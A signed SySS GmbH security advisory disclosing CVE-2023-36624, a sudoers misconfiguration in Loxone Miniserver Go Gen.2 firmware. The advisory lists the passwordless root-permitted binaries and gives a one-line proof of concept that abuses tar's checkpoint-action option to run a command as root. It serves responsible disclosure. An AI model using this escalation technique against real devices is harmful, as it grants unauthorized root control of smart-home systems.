-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2023-004 Product: Miniserver Go Gen.2 Manufacturer: Loxone Affected Version(s): <14.0.3.28 Tested Version(s): 14.0.3.28, 13.1.11.17 Vulnerability Type: Execution with Unnecessary Privileges (CWE-250) Risk Level: Low Solution Status: Open Manufacturer Notification: 2023-04-19 Solution Date: tba Public Disclosure: 2023-06-30 CVE Reference: CVE-2023-36624 Author of Advisory: Tobias Jäger, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Loxone Miniserver Go is a smart home hub. The manufacturer describes the product as follows (see [1]): "The Loxone Miniserver Go serves as central control unit for all kinds of automation tasks." Due to a misconfiguration of the sudoers file, it is vulnerable to a local privilege escalation. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The Linux-based firmware uses the user "lx" as a low-privileged user. Sudo is used to execute commands with higher privileges. The user "lx" is granted these rights even without the need to insert the user's password for several binaries. Some of these binaries allow the execution of code, like the archive tool tar. The user "lx" is allowed to execute the following binaries with root privileges without the need of entering their password: lx ALL=NOPASSWD: /usr/sbin/dumpe2fs -h /dev/mmcblk0p6, /usr/bin/ntpdate *, /usr/bin/lsof, \ /usr/bin/tee /proc/sys/vm/drop_caches, /usr/bin/tee -a /var/log/*, \ /usr/bin/openssl *, /usr/bin/tar *, \ /usr/bin/systemctl restart systemd-networkd.service, \ /usr/bin/updateflash /dev/mtd5 0x0 *, /usr/bin/systemctl reboot, \ /usr/bin/systemctl restart pure-ftpd.service, \ /usr/bin/systemctl stop starthomekit.service, \ /usr/bin/systemctl restart starthomekit.service, \ /usr/bin/systemctl restart avahi-daemon, \ /usr/bin/miniserverinit applytzdata *, \ /usr/bin/eebus, /usr/bin/ssh*, /usr/bin/ln *, /usr/bin/journalctl *, /usr/bin/tee /var/log/*, \ /usr/bin/hostnamectl *, /usr/bin/killall *, \ /usr/bin/chmod 644 /etc/factory/*, \ /usr/bin/systemctl is-active --quiet *, \ /usr/bin/cat /root/.ssh/known_hosts For example, /usr/bin/tar can be used to execute arbitrary system commands and therefore escalate privileges to the root user. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): With the following line, the user "lx" can execute the whoami command in the context of the root user: sudo tar -cf /dev/null /dev/null --checkpoint=1 -checkpoint-action=exec="whoami" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: - - ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2023-01-19: Vulnerability discovered 2023-04-19: Vulnerability reported to manufacturer tba: Patch released by manufacturer 2023-06-30: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for the Loxone Miniserver Go https://www.loxone.com/dede/kb/miniserver-go/ [2] SySS Security Advisory SYSS-2023-004 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-004.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Tobias Jäger of SySS GmbH. E-Mail: tobias.jaeger@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Tobias_Jaeger.asc Key ID: 0xABF0CF2F4D0220F9 Key Fingerprint: 5C9F 5312 F37E B9AB E87B 1212 ABF0 CF2F 4D02 20F9 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEXJ9TEvN+uavoexISq/DPL00CIPkFAmSdKeQACgkQq/DPL00C IPkboQ//aOBNlO7FCXTawgWoRXopVafie3zM1C/GgKt5cQNFqwmLNi8PB+3u6aO0 K2n4RtwCv7UYbpuV85nYe77OB4ApXQ7h0V2jRGzrekYGWOTZURsMfQ9EOtQfz6KX eehmMYlgLP1TOU96MaS9R95sxujkIg2hKZAEFrWmz2yq8q6aL9uwkye3FttXl9mx LKxP2CCKnzxmPezT9MyIdpOkVPnBn3uZQ2JvTrEe7NatTKHXqE1E72ZI/ur7X7D9 TCyBIr7ETGetHUqW/zFLNriruwjYilXiXahDV7jxwjOb+RtVv3MhkwVpyRjs1cOx QNSHij+Myspoqryly7XjOn7B5MNvaQ0mSqu0xtavnIf9XtVoLQMVXyZN0tWgEDD6 iEBBdf8QM2rb1ce8Q+2UAQDFUkCCKtLL6Q0q/Swn4I7bG/Vm+MrDkD0k1MAdX6Rt ukSU6+xFNbtT4zKcPdZCXTRk/aAZ9fQN1UATF8OkV1psGxEgXRZuleuLugt5c6+M Ub7qGklBYq7OVnv9c54L9HXpLOTOX6hN+5uhnc3b1+SIN3U5YAALkfWO0b30t8Yr ZC+XyrNcszTo7BqzO+/SRlHBAgigqoE7vNq74HV1o2T6MeYDZLWxF8RKTtJ9InpQ n3RRYcrIvKAUHYRH12LodTXUMB6WLQAEn7Nj4+ofhiNdN0YoRBU= =ev9p -----END PGP SIGNATURE-----